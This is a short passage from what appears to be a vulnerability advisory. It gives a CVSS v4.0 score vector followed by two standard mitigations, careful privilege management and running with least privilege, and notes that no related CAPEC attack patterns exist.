      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation MIT-1
Architecture and Design Operation

Very carefully manage the setting, management, and handling of privileges. Explicitly manage trust zones in the software.

Mitigation MIT-17
Architecture and Design Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

No CAPEC attack patterns related to this CWE.